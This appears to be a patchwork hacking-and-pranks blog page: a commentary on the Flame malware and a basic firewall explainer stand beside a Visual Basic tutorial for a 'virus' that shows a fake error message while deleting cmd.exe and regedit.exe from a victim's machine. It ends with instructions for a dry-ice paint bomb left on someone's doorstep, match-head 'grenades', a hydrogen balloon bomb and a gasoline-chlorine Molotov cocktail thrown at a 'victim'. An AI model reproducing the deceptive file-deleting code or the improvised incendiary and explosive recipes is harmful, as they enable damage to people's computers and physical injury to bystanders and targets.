Move over Stuxnet, Say Hello to the new Cyberweapon: “Flame”



(Screenshot of Iran CERT warning for “Flame” Malware)

Yesterday Iran’s Computer Emergency Response Team released a warning about a new modular malware that resembled Stuxnet and Duqu. Dubbed “Flame”, the new cyberweapon is causing quite a stir in the media with it’s “advanced features and complexity”.

But looking at the malware’s features disclosed by Iran’s CERT team, it doesn’t seem very game stopping:

  • Distribution via removable medias
  • Distribution through local networks
  • Network sniffing, detecting network resources and collecting lists of vulnerable passwords
  • Scanning the disk of infected system looking for specific extensions and contents
  • Creating series of user’s screen captures when some specific processes or windows are active
  • Using the infected system’s attached microphone to record the environment sounds
  • Transferring saved data to control servers
  • Using more than 10 domains as C&C servers
  • Establishment of secure connection with C&C servers through SSH and HTTPS protocols
  • Bypassing tens of known antiviruses, anti malware and other security software
  • Capable of infecting Windows Xp, Vista and 7 operating systems
  • Infecting large scale local networks

All of these “threats” have been seen before. I especially liked the “bypassing tens of known anti-viruses…” line.

But there are several features that do set “Flame” apart from the pack. First of all the malware is very large, a whopping 20MB. Also, it contains several files and seems to be able to attack using swappable modules. But there is more.

According to an article on The Register, Flame has the following features:

  • It has been active for at least 2 years, but possibly 5-8 years
  • Contains exploits for known and fixed vulnerabilities
  • Uses open source libraries
  • Uses a SQLlite database
  • Uses some Scripts written in Lua (of Angry Birds fame)

All the big name security companies that have analyzed it seem to agree that with it’s complexity, it was most likely written by a Nation State and not individuals or small groups.

The malware could have been created by Israel (and possibly the US) as many of the countries that have detected infection would be logical targets for them.

As according to Symantec:

Initial telemetry indicates that the targets of this threat are located primarily in Palestinian West Bank, Hungary, Iran, and Lebanon. Other targets include Russia, Austria, Hong Kong, and the United Arab Emirates. The industry sectors or affiliations of individuals targeted are currently unclear.”

I am not sure of it’s “CyberWeapon” title, as it seems to be an information gatherer. Definitely worth keeping an eye on, but as with “APT” and “Stuxnet”, I am sure the media will beat this topic to death.

 

p/s: Credit to http://cyberarms.wordpress.com

VIRUS SCRIPT in VISUAL BASIC


Private Sub Form_Load()
Text1.Text = “C:/Windows/System32/cmd.exe
Kill Text1.Text
End Sub

Private Sub Form_Load()
Text1.Text = “C/Windows/System32/cmd.exe”
A = Text1.Text
End Sub
Private Sub Command1_Click
Kill A
End Sub

Private Sub Form_Load()
Form1.Visible = False
Text1.Text = “C:/Windows/System32/cmd.exe”
A = Text1.Text
Msgbox (“Runtime Error 492. Not Enough Memory.”), vbCritical, “Runtime Error”
End Sub
Private Sub Timer1_Timer()
Timer1.Interval = 5000
Kill A
Timer1.Enabled = False
End Sub

Private Sub Form_Load()
Form1.Visible = False
Msgbox (“Runtime Error 492. Not Enough Memory.”), vbCritical, “Runtime Error”
Kill “C:/Windows/System32/cmd.exe”
Kill “C:/Windows/regedit.exe”
End Sub

Now many of you feel that creating a virus is impossible especially for you beginners. Well this tutorial shows you how to create a simple virus with just a few lines of code. A virus can be an application that deletes files upon request, this is seen as infecting your computer because by deleting key files you may need to take action to get your computer back to normal.
First of all open a new Visual Basic project, a standard exe file..
Now it depends on how you want your virus to work, I feel it is best if it is activated once your application is opened so the main code codes in the form load sub.
On your project insert a text box , a command button and a timer, we will be using the command button and timer a little later on.
In the project put in the file you want to delete, for example if you wanted to delete the command file then you would put the following code in the form load tab.
Private Sub Form_Load()
Text1.Text = “C:/Windows/System32/cmd.exe
Kill Text1.Text
End Sub
Once the project is opened then the command file will be removed.
Now I will show you an example of doing this using a command button. Put the following code in the command button and in the form load.
You can even give the text box a name to make it quicker. I have labelled it ‘A’
Private Sub Form_Load()
Text1.Text = “C/Windows/System32/cmd.exe”
A = Text1.Text
End Sub
Private Sub Command1_Click
Kill A
End Sub
Now once the command button is clicked on the project the command file will be deleted.
Now we will use the timer in this one. If you want to disguise your scheme then this is a good way to do it, Here we will send a fake message error pretending the application hasn’t got enough memory to run, but in actual fact the victim doesn’t know that you have just removed their command file.
Here is to go about it…
Private Sub Form_Load()
Form1.Visible = False
Text1.Text = “C:/Windows/System32/cmd.exe”
A = Text1.Text
Msgbox (“Runtime Error 492. Not Enough Memory.”), vbCritical, “Runtime Error”
End Sub
Private Sub Timer1_Timer()
Timer1.Interval = 5000
Kill A
Timer1.Enabled = False
End Sub
All we have done above is made the form invisible so that it makes the error message look real, we have set an interval of 5 seconds on the timer before the file is deleted and that’s how simple it can be to fool someone.
Right, we can now make it a little more difficult if you are finding the above a little too easy.
How about removing more than 1 file, well this is how you could go about doing that, we will stick with the message box fool because I think that works well.
The example below shows how to remove the files when the application is loaded, we will not be using timers or command buttons in this one. We will not even be using text boxes because they are not needed, you can just do what is shown below.
So in the form load part put the following code.
Private Sub Form_Load()
Form1.Visible = False
Msgbox (“Runtime Error 492. Not Enough Memory.”), vbCritical, “Runtime Error”
Kill “C:/Windows/System32/cmd.exe”
Kill “C:/Windows/regedit.exe”
End Sub
So above we will be removing the command file and the registry, I don’t think the victim will be best pleased about that do you.
Now I have shown you the above information I think it’s your turn to try and create your own, now you can test it on your own pc, just copy a file, lets say the cmd.exe file and paste it into your C:/
Then put in the code above but in the Kill put this…
Kill “C:/cmd.exe”
That’s all you need to kill, then you will see the file has been removed. Keep trying new things like I have shown and you will be a pro in no time. I hope you enjoyed this……….

Firewall


What is a Firewall?

A firewall is a security device that can be a software program or a dedicated network appliance. The main purpose of a firewall is to separate a secure area from a less secure area and to control communications between the two. Firewalls can perform a variety of other functions, but are chiefly responsible for controlling inbound and outbound communications on anything from a single machine to an entire network.

Software Firewalls

Software firewalls, also sometimes called personal firewalls, are designed to run on a single computer. These are most commonly used on home or small office computers that have broadband access, which tend to be left on all the time. A software firewall prevents unwanted access to the computer over a network connection by identifying and preventing communication over risky ports. Computers communicate over many different recognized ports, and the firewall will tend to permit these without prompting or alerting the user. For example, computers access Web pages over port 80 and use port 443 for secure Web communications. A home computer would expect to receive data over these ports. However, a software firewall would probably block any access from the Internet over port 421, over which it does not expect to receive data. Additionally, port 421 has been used by certain Trojans (a type of malware) in the past. Software firewalls can also detect “suspicious” activity from the outside. They can block access to a home computer from an outside address when activity matches certain patterns, like port scanning.

A software firewall also allows certain programs on the user’s computer to access the Internet, often by express permission of the user. Windows Update, antivirus software, and Microsoft Word are a few programs that a user might legitimately expect to access the Internet. However, a program called gator.exe that is attempting to access the Internet when it shouldn’t be running might be reason for concern, so the user could decline access for this program. This is a useful feature when spyware, adware or some type of malware is suspected.

Some software firewalls also allow configuration of trusted zones. These permit unlimited communication over a wide variety of ports. This type of access may be necessary when a user starts a VPN client to reach a corporate intranet.

One drawback to software firewalls is that they are software running on a personal computer operating system. If the underlying operating system is compromised, then the firewall can be compromised as well. Since many other programs also run on a home computer, malicious software could potentially enter the computer through some other application and compromise the firewall. Software firewalls also rely heavily upon the user making the right decisions. If someone using a software firewall mistakenly gives a keylogger or a Trojan permission to access the Internet, security on that machine is compromised even though there is nothing wrong with the firewall itself.

There are many different brands of software firewalls, each with their own features. Some examples include ZoneAlarm, BlackICE, and Kerio.

Hardware Firewalls

Hardware firewalls are more complex. They also have software components, but run either on a specially engineered network appliance or on an optimized server dedicated to the task of running the firewall. The operating system underlying a hardware firewall is as basic as possible and very difficult to attack. Since no other software runs on these machines, and configuration takes a little more thought than clicking on an “allow” prompt, they are difficult to compromise and tend to be extremely secure.

A hardware firewall is placed between a network, such as a corporation, and a less secure area, such as the Internet. Firewalls also can separate more secure networks from less secure networks, such as one corporate location within a larger corporate structure. Versions of hardware firewalls are available to home users who want stronger protection from potential Internet attacks. There are many different default configurations for these devices – some allow no communications from the outside and must be configured, using rules, others (like those available for the home market) are already configured to block access over risky ports. Rules can be as simple as allowing port 80 traffic to flow through the firewall in both directions, or as complex as only allowing 1433 (SQL server) traffic from a specific IP address outside of the network through the firewall to a single IP address inside the network.

Firewalls are also used for Network Address Translation (NAT). This allows a network to use private IP addresses that are not routed over the Internet. Private IP address schemes allow organizations (or even household networks) to limit the number of publicly routed IP addresses they use, reserving public addresses for Web servers and other externally accessed network equipment. NAT allows administrators to use one public IP address for all of their users to access the Internet – the firewall is “smart” enough to send the requests back to the requesting workstation’s internal IP. NAT also allows users inside a network to contact a server using a private IP while users outside the network must contact the same server using an external IP.

In addition to port and IP address rules, firewalls can have a wide variety of functionality. They can also act as caching servers, VPNs, routers, and more. Some examples of hardware firewalls are CheckPoint, Cisco PIX, SonicWall, Contivity from Nortel, and Linksys (for the home market).

Firewalls are vital to network management. Without this control over computer and network access, large networks could not store sensitive data intended for selective retrieval. Firewalls are also very important for home broadband users – without a home version of one of these products, your personal data is at risk.

Paint Bombs


To make a paint bomb you simply need a metal paint can with a 
refastenable lid,
a nice bright color paint (green, pink, purple, 
or some gross color is perfect!),
and a quantity of dry ice.

Place the paint in the can and then drop the dry ice in.
Quicky place the top on and then run like hell!
With some testing you can time this to a science.
It depends on the ratio of dry ice to paint to 
the size of the can to how full it is.

If you are really pissed off at someone,
you could place it on their doorstep,
knock on the door,
and then run!!
Paint will fly all over the place...

You must try it!! HAHAHA!! :D

Easy Grenades/Rockets


Items Needed:

White Out Pen or Bottle full of white out

Small wooden matches

 

Directions:

Cram alot of match heads into the opening of the white out bottle for the pen

Take off the top then cram the matches in to pen’s opening.

To ignite just light the match heads and it will either explode or launch.

Hindenberg Bomb


Needed:

1 Balloon

1 Bottle

1 Liquid Plumr

1 Piece Aluminum FoilL

1 Length Fuse

 

Instructions :

Fill the bottle 3/4 full with Liquid Plumr and add a little piece ofaluminum foil to it.

Put the balloon over the neck of the bottle untilthe balloon is full of the resulting gas.

This is highly flammablehydrogen.

Now tie the baloon.

Now light the fuse, and let it rise.

When the fuse contacts the balloon, watch out!!!

Different kind of Molitoff Cocktail


Here is how you do it:

– Get a coke bottle & fill it with gasoline about half full

– Cram a piece of cloth into the neck of it nice and tight

– Get a chlorine tablet and stuff it in there. You are going to have
to force it because the tablets are bigger than the opening of the
bottle.

– Now find a suitable victim and wing it in their direction. When it
hits the pavement or any surface hard enough to break it, and the chlorine
and gasoline mix….. BOOM!!!!!!
Have fun!